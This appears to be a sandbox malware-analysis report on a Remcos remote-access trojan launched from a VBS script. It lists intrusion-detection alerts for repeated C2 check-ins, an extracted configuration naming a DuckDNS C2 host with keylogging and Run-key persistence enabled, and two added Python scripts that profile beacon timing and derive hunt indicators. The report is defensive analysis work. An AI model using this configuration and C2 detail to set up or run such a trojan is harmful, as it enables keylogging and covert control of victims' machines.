                    2024-10-31T07:43:04.500479+010020327761Malware Command and Control Activity Detected192.168.2.450087181.236.112.1692001TCP
                    2024-10-31T07:43:05.470561+010020327761Malware Command and Control Activity Detected192.168.2.450088181.236.112.1692001TCP
                    2024-10-31T07:43:06.222550+010020327761Malware Command and Control Activity Detected192.168.2.450089181.236.112.1692001TCP
                    2024-10-31T07:43:06.974546+010020327761Malware Command and Control Activity Detected192.168.2.450090181.236.112.1692001TCP
                    2024-10-31T07:43:07.703876+010020327761Malware Command and Control Activity Detected192.168.2.450091181.236.112.1692001TCP
                    2024-10-31T07:43:08.442565+010020327761Malware Command and Control Activity Detected192.168.2.450092181.236.112.1692001TCP
                    2024-10-31T07:43:09.861260+010020327761Malware Command and Control Activity Detected192.168.2.450093181.236.112.1692001TCP
                    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                    2024-10-31T07:41:21.752336+0100 | 2858295 | 1 | A Network Trojan was detected | 188.114.97.3 | 443 | 192.168.2.4 | 49736 | TCP
                    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                    2024-10-31T07:41:19.134483+0100 | 2841075 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49736 | 188.114.97.3 | 443 | TCP
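The alert rows above show one signature, 2032776, firing against 181.236.112.169:2001 roughly every 1 to 1.5 seconds, each time from a fresh source port, which is consistent with the "Connect interval": "1" value in the extracted configuration further down. The script below is an added example, not part of the Joe Sandbox report: it reads rows in the table's column order (Timestamp, SID, Severity, Classtype, Source IP, Source Port, Destination IP, Destination Port, Protocol), groups them per source host, destination host:port and SID, and scores how periodic each group is and whether every hit was a new TCP connection. The sample rows are constructed from a few of the report's entries; the hit-count and jitter thresholds are assumptions.

```python
"""Beacon-cadence check over Suricata alert rows (added example, not report code)."""
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed sample in the report's column order: six consecutive 2032776 hits
# against the C2 plus one unrelated inbound alert.
SAMPLE_ROWS = """\
2024-10-31T07:42:20.766372+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49899 | 181.236.112.169 | 2001 | TCP
2024-10-31T07:42:22.244555+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49910 | 181.236.112.169 | 2001 | TCP
2024-10-31T07:42:23.625678+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49917 | 181.236.112.169 | 2001 | TCP
2024-10-31T07:42:24.962289+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49923 | 181.236.112.169 | 2001 | TCP
2024-10-31T07:42:26.266463+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49934 | 181.236.112.169 | 2001 | TCP
2024-10-31T07:42:27.570771+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49940 | 181.236.112.169 | 2001 | TCP
2024-10-31T07:41:21.752336+0100 | 2858295 | 1 | A Network Trojan was detected | 188.114.97.3 | 443 | 192.168.2.4 | 49736 | TCP
"""


def parse_rows(text):
    """Split pipe-delimited alert rows into typed dicts (9 columns expected)."""
    rows = []
    for line in text.strip().splitlines():
        fields = [f.strip() for f in line.split("|")]
        if len(fields) != 9:
            raise ValueError(f"expected 9 columns, got {len(fields)}: {line!r}")
        ts, sid, sev, classtype, sip, sport, dip, dport, proto = fields
        rows.append({
            # strptime's %z accepts the report's '+0100' offset on every Python 3
            "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z"),
            "sid": int(sid), "severity": int(sev), "classtype": classtype,
            "src": sip, "sport": int(sport), "dst": dip, "dport": int(dport),
            "proto": proto,
        })
    return rows


def beacon_profile(rows, min_hits=5, max_jitter=0.25):
    """Group alerts by (src host, dst host, dst port, SID) and score regularity.

    jitter = population stdev / mean of the inter-hit gaps; a group is called
    periodic when it has at least min_hits hits and jitter <= max_jitter.
    Both thresholds are assumptions to tune against your own baseline.
    """
    groups = defaultdict(list)
    for r in rows:
        groups[(r["src"], r["dst"], r["dport"], r["sid"])].append(r)

    profile = {}
    for key, hits in groups.items():
        hits.sort(key=lambda r: r["ts"])
        times = [r["ts"] for r in hits]
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        entry = {"hits": len(hits),
                 "distinct_sports": len({r["sport"] for r in hits})}
        if len(gaps) >= 2:
            mean = statistics.mean(gaps)
            entry["median_gap"] = statistics.median(gaps)
            entry["jitter"] = statistics.pstdev(gaps) / mean if mean else float("inf")
        entry["periodic"] = (len(hits) >= min_hits
                             and entry.get("jitter", float("inf")) <= max_jitter)
        # one ephemeral port per hit means each check-in opened a new TCP connection
        entry["new_conn_per_hit"] = entry["distinct_sports"] == len(hits)
        profile[key] = entry
    return profile


if __name__ == "__main__":
    for key, entry in beacon_profile(parse_rows(SAMPLE_ROWS)).items():
        print(key, entry)
```

Run against the full alert list the C2 group reports a median gap of about 1.3 s with low jitter and a distinct source port for every hit; the single inbound 2858295 alert is left unscored. Widen `max_jitter` for implants that randomise their sleep, and group on destination only if the implant rotates source addresses.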


                    AV Detection

                    Source: 00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": ["sost.duckdns.org:2001:0"], "Assigned name": "NewssTar", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-T0UVJ0", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": ""}
                    Source: asegurar.vbs | ReversingLabs: Detection: 15%
                    Source: Yara match | File source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.powershell.exe.260356ab680.4.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.powershell.exe.260356ab680.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000008.00000002.2961914920.0000000002C1E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.1927741950.0000026035520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.1927741950.0000026035581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: powershell.exe PID: 980, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: AddInProcess32.exe PID: 7372, type: MEMORYSTR
                    Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 8_2_004338C8
                    Source: powershell.exe, 00000003.00000002.1927741950.0000026035520000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_63aeaf56-9
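The configuration the extractor recovered above is what an analyst turns into network and host indicators. The following script is an added example, not part of the report or of Remcos: it parses that JSON, splits the "Host:Port:Password" entries, normalises the Enable/Disable and 1/0 switches, and returns the items worth hunting for (C2 host and port, mutex, Run-key persistence flags, keylogger file). The relative paths it builds from "Copy folder"/"Copy file" and "Keylog folder"/"Keylog file" are assumptions about how those fields combine; in this run the keylog file did land at C:\ProgramData\remcos\logs.dat, as the dropped-file Yara match above records.

```python
"""Normalise an extracted Remcos configuration into hunt artefacts (added example)."""
import json

# Constructed from the report's extractor output, abridged to the fields used here.
REMCOS_CONFIG = r'''{"Host:Port:Password": ["sost.duckdns.org:2001:0"], "Assigned name": "NewssTar", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Mutex": "Rmc-T0UVJ0", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Copy folder": "Remcos", "Keylog folder": "remcos"}'''

SWITCH_ON = {"enable", "enabled", "1", "true", "yes"}


def switch(cfg, key, default="Disable"):
    """Remcos fields mix 'Enable'/'Disable' and '1'/'0'; normalise both to bool."""
    return str(cfg.get(key, default)).strip().lower() in SWITCH_ON


def parse_c2(entry):
    """'host:port:password' -> dict. Split from the right so an empty password
    and a plain hostname are both handled."""
    host, port, password = entry.rsplit(":", 2)
    return {"host": host, "port": int(port), "password": password}


def hunt_artifacts(raw_json):
    """Return the indicators an analyst pivots on, grouped by where to look."""
    cfg = json.loads(raw_json)
    c2 = [parse_c2(e) for e in cfg.get("Host:Port:Password", [])]
    # Relative-path composition is an assumption; the report confirms the keylog
    # file resolved to C:\ProgramData\remcos\logs.dat in this run.
    copy_path = cfg.get("Copy folder", "") + "\\" + cfg.get("Copy file", "")
    keylog_path = cfg.get("Keylog folder", "") + "\\" + cfg.get("Keylog file", "")
    return {
        "campaign": cfg.get("Assigned name"),
        "c2": c2,
        # hostnames only: DNS-resolvable names (here a DuckDNS dynamic domain) go to DNS hunts
        "dns": sorted({c["host"] for c in c2 if not c["host"].replace(".", "").isdigit()}),
        "beacon_interval_s": int(cfg.get("Connect interval", 0) or 0),
        "mutex": cfg.get("Mutex"),
        "persistence": {
            "hkcu_run": switch(cfg, "Setup HKCU\\Run"),
            "hklm_run": switch(cfg, "Setup HKLM\\Run"),
            "install_enabled": switch(cfg, "Install flag"),
            "copy_relative_path": copy_path,
        },
        "keylog": {
            "enabled": switch(cfg, "Keylog flag"),
            "relative_path": keylog_path,
            "encrypted": switch(cfg, "Keylog crypt"),
        },
    }


if __name__ == "__main__":
    print(json.dumps(hunt_artifacts(REMCOS_CONFIG), indent=2))
```

Note that "Install flag" is disabled while both Run-key switches are enabled; the function reports both rather than guessing which wins, so the hunt covers the Run keys and the Remcos\remcos.exe copy path as well as the unencrypted logs.dat keylog.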

                    Exploits

                    Source: Yara match | File source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.powershell.exe.260356ab680.4.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.powershell.exe.260356ab680.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.1927741950.0000026035520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.1927741950.0000026035581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: powershell.exe PID: 980, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: AddInProcess32.exe PID: 7372, type: MEMORYSTR

                    Privilege Escalation

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_00407538 _wcslen,CoGetObject, 8_2_00407538
                    Source: unknown | HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49730 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 164.132.58.105:443 -> 192.168.2.4:49731 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 164.132.58.105:443 -> 192.168.2.4:49733 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49736 version: TLS 1.2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 8_2_0040928E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 8_2_0041C322
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 8_2_0040C388
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 8_2_004096A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 8_2_00408847
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_00407877 FindFirstFileW,FindNextFileW, 8_2_00407877
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 8_2_0040BB6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW, 8_2_00419B86
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 8_2_0040BD72
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 8_2_00407CD2

                    Software Vulnerabilities

                    Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4x nop then jmp 00007FFD9B97D896h 3_2_00007FFD9B97D7F8
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4x nop then jmp 00007FFD9B97AD43h 3_2_00007FFD9B97ACD5

                    Networking

                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49741 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49747 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49758 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49755 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49762 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49750 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49746 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49749 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49745 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49751 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49744 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49766 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49761 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49752 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49759 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49756 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49753 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49764 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49754 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49748 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49777 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49783 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49760 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49743 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49742 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49794 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49805 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49816 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49824 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49844 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49853 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49861 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49757 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49872 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49881 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49889 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49899 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49910 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49917 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49833 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49940 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49951 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49957 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49965 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49974 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49980 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49989 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50003 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50009 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49997 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50018 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50032 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50026 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50038 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50044 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50051 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50064 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50070 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50073 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50058 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50074 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50075 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50080 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50083 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50086 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50076 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50078 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50077 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50091 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50079 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50072 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50092 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50087 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50067 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50081 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50090 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50085 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50088 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50069 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50084 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50089 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50082 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50093 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49923 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49934 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50068 -> 181.236.112.169:2001
                    Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50071 -> 181.236.112.169:2001
